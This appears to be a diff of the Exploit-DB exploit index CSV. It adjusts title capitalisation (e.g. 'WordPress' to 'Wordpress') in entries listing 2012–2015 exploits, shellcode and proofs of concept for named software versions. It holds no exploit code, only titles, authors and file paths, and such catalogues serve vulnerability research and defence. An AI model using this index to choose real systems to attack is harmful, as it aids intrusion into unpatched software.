36579,platforms/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 @@ -33011,23 +33011,23 @@ id,file,description,date,author,platform,type,port 36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 -36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 +36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 +36620,platforms/php/webapps/36620.txt,"Wordpress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 -36610,platforms/php/webapps/36610.txt,"WordPress Video Gallery Plugin 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36611,platforms/php/webapps/36611.txt,"Multiple UpThemes WordPress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 -36612,platforms/php/webapps/36612.txt,"WordPress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36613,platforms/php/webapps/36613.txt,"WordPress Simple Ads Manager Plugin - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 -36614,platforms/php/webapps/36614.txt,"WordPress Simple Ads Manager 2.5.94 Plugin - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 -36615,platforms/php/webapps/36615.txt,"WordPress Simple Ads Manager Plugin - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 +36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36611,platforms/php/webapps/36611.txt,"Multiple UpThemes Wordpress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 +36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 +36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 Plugin - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 +36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager Plugin - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 -36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 Plugin - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36617,platforms/php/webapps/36617.txt,"Wordpress VideoWhisper Video Presentation 3.31.17 Plugin - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 @@ -33040,15 +33040,15 @@ id,file,description,date,author,platform,type,port 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0 -36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 +36631,platforms/php/webapps/36631.txt,"Wordpress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 +36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 Plugin - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 +36640,platforms/php/webapps/36640.txt,"Wordpress Work The Flow File Upload 2.5.2 Plugin - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 @@ -33079,13 +33079,13 @@ id,file,description,date,author,platform,type,port 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 -36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 Plugin - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 -36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 +36671,platforms/php/webapps/36671.txt,"Wordpress All In One WP Security & Firewall 3.9.0 Plugin - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 +36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 -36677,platforms/php/webapps/36677.txt,"WordPress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 +36677,platforms/php/webapps/36677.txt,"Wordpress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 @@ -33099,8 +33099,8 @@ id,file,description,date,author,platform,type,port 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authenticated Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 -36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 +36691,platforms/php/webapps/36691.txt,"Wordpress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 +36692,platforms/osx/local/36692.py,"Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 @@ -33108,7 +33108,7 @@ id,file,description,date,author,platform,type,port 36697,platforms/php/webapps/36697.txt,"Nova CMS - optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36698,platforms/php/webapps/36698.txt,"Nova CMS - includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36699,platforms/php/webapps/36699.txt,"Nova CMS - includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 +36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33140,30 +33140,30 @@ id,file,description,date,author,platform,type,port 36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36733,platforms/php/webapps/36733.txt,"WordPress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 -36735,platforms/php/webapps/36735.txt,"WordPress Duplicator 0.5.14 Plugin - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 +36733,platforms/php/webapps/36733.txt,"Wordpress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 +36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator 0.5.14 Plugin - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 -36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 +36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local,0 -36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 +36761,platforms/php/webapps/36761.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 -36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 +36745,platforms/osx/local/36745.rb,"Mac OSX - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36751,platforms/php/webapps/36751.txt,"WordPress Video Gallery 2.8 Plugin - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 -36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 +36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 Plugin - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 +36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 -36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 -36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Exploit (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 +36762,platforms/php/webapps/36762.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 +36763,platforms/php/webapps/36763.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Exploit (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - pfile/kommentar.php filecat Parameter Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 @@ -33174,13 +33174,13 @@ id,file,description,date,author,platform,type,port 36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,cgi,webapps,0 36773,platforms/windows/dos/36773.c,"Microsoft Windows - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 -36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0 +36774,platforms/php/webapps/36774.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 -36777,platforms/php/webapps/36777.txt,"WordPress Ajax Store Locator 1.2 Plugin - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 -36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 -36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 -36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 +36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 Plugin - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 +36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 +36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 +36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0 36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php' class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -33198,19 +33198,19 @@ id,file,description,date,author,platform,type,port 36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,ios,webapps,0 36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 -36800,platforms/php/webapps/36800.txt,"WordPress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 -36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0 -36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 +36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 +36801,platforms/php/webapps/36801.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0 +36802,platforms/php/webapps/36802.txt,"Wordpress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 -36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 +36805,platforms/php/webapps/36805.txt,"Wordpress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 -36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36809,platforms/php/remote/36809.rb,"Wordpress Reflex Gallery Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36810,platforms/php/remote/36810.rb,"Wordpress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 -36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 +36814,platforms/osx/dos/36814.c,"Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 @@ -33222,8 +33222,8 @@ id,file,description,date,author,platform,type,port 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 -36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps,0 -36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps,0 +36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps,0 +36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 @@ -33236,7 +33236,7 @@ id,file,description,date,author,platform,type,port 36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 